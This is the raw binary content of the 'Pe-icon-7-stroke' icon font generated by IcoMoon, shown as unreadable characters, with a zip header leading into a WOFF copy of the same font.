" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
0��EDD�DD+11�11�00��&?7.'.#"3267>54&'.'77"&'.5467>32#���	555	�)�[//..��555

���(��/../����#(AJO%'5>7>54&'.#"'77557467>32#"&'.5'5357573	
	3��w���ff#				fw33wff�h		^8�8DD�D�)�*�B				��E�KB�<3�3�����,B'!!7'5815#*1">7>31021021358=!3>7>3:7ޫ���U�{{!(	13���'
./DQt@�w:SSS-%
 �hg$3 '
M.�����(8Ng�%1'54&'.#"3267>?3'%467>325#"&/.546?357#.103267>5&4'"&'.5<59>7>7#f�
F`	
		zi4�EĀ
a��G�34		6�

kG	
`{5�DZ̀`�l}��#IJ#		.				����*/45##;267>5#'3#5+"&'.533#5;#5��3
�
3xgg��͉4>����

www�t

��s++++��1J!!77!5!5!5''5!'267>54&'.#"352#"&'.5467>3��Uxv<Y�}��w�]<xx�^				

		��f���~w3Z �VVy`3w}��				E
		
������(A%#.'.'467>7.#&"'>54&'.#".'.5467>7'3267>?33:3>3326?>764/>7>73267>=.'.#%467>32.'.5+#"&/#*'./#*/.'&4?'.'.5467>3:27>7>732'#"&'.5467>32�
		
		

				



		

		��

		

^	


	

B&
	
	^�


		








	
		

			�		

�		

	


4

			
	8	$��1j������"3267>54&'.#"&'.5467>32#7>54&'.#"'>54&'.#".'.#"75''73267>54&'73267>73267>77#"&'.5467>32'2#"&'.5467>32#"&'.5467>3'557�				
		


�			
		
		&�� ��
	
	

	
ɼ�

�

U�����F				D				<						�bc�jV		
		U|				L				3				LW�X��W�X��!?C%7'>7>54&'.#2'7%467>7735"&'.57'7Hz0
 K*'D+8C��
4z' J+'D\
8B�}0
+J D'

-iD:
� 
5})#+J D'�D:
	��U�1MQajoty"3267>54&'.#"&'.5467>32#<5<54&'.'!'#73#5467>77#<5<53#5;#5#3#5�								U
  UUU�11��					11^+Vi				E	

	s0"
)$$*	#0jkZ??�"

"�??
aUU3333
����HR\fpz����%75'.'.'7'.'./#'737>7>77'>7>774654&5'.'.'7'3"&#"#77'57''7#'239263'"&'.5467>7>7>312#7'>7>7�DD&'3
@
5'%DD&'3
@	4''333N&�"�':33N%�" 8 8
�'�@
3'&DD%'5
@
4''DD&'6
8!
�&:33N&�"�&;33D8 8 
(D�%10>7>5<1'.'.=7'77'7'��>*+=��6&%7���3333333��.((.���(%

%(�؃4344344��1Vo�"3267>54&'.#"&'.5467>32#7&#"&'.'.3267>76&''#"&'.5467>323#"&'.5467>32�+J  J+*K  K*'DD''DD'j

!!�				�



� J++J  J++J �wD''DD''D�	

	\								����Vc|�#357'7'.=>7>54&'.#"3267>54&'.'57>=354632#"&5#"&'.5467>323#5�;;##6	
	C		
G�



�				+z;):�	::	��6(

(
C0		vG);g



��				^����hm����.'.#"73267>54&'.#"'.#"3267>74&'77'.'&677'>7>327''7>32#"&'&47#"&'.5467>327'7'7� 	A	R*T

A
***+

+))�O�rBAQ*T

A63***45)
))+���
��x����)41'7'77>?357'#"&'.'.'37!.7>?�YIH
�II530)�g/0�$5��
N��Z34HH�IH0)��	$6#
N�>s��_<�Вd~Вd~��������3++3UU^+3<*3<7G^+3+"33+fx+/3<++3�+"o3+U+++DU�++U+<++*3++3++f33f"k33<^+U"33+B+33<3+++3f+3+3++ +3�+�*�*�*�*�a��r��������������.�����������������#���+����������V�E����
��~�2nJ��t��	@	j	�

�J|��
z
�r��
��.P��6N��@��Jl�V�pF��Z��j��v�� ` �!!�""�#4%�&&�&�((�(�)*4*�,|,�-N..^.�//$/\/�0t0�11>1�22F2�3L3�3�4:4t5�6J6�77�88z8�9D:0;;�;�<<l<�=�>">�?^?�?�@L@vA$ALAfA�A�B4BHB�B�CC"C|D$D�EZE�E�F�G\HH�J�K�LL�M�NNlOO�PPP�QQ<RR�SVS�UUtWXXzX�Y�Z�[2[�\V]x]�^P^�_d_�_�`�a�b6b�b�c<c�dd�ee�gZh�ii�j�k2k�l�m�m���� � 6 � V
4�	 	�	 6	 �	 	 f	
4�Pe-icon-7-strokeVersion 1.0Pe-icon-7-strokePe-icon-7-strokePe-icon-7-strokeRegularPe-icon-7-strokeFont generated by IcoMoon.PK!u�����=it_sanctum/fonts/pe-icon-7-stroke/fonts/Pe-icon-7-stroke.woffnu&1i�wOFF��pOS/2``"�cmaphLLU� gasp�glyf�����Ƴ>�headݰ66E	�hhea��$$��hmtx�88}~loca�D����bmaxp��  ��name���vͫ�post�  �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5




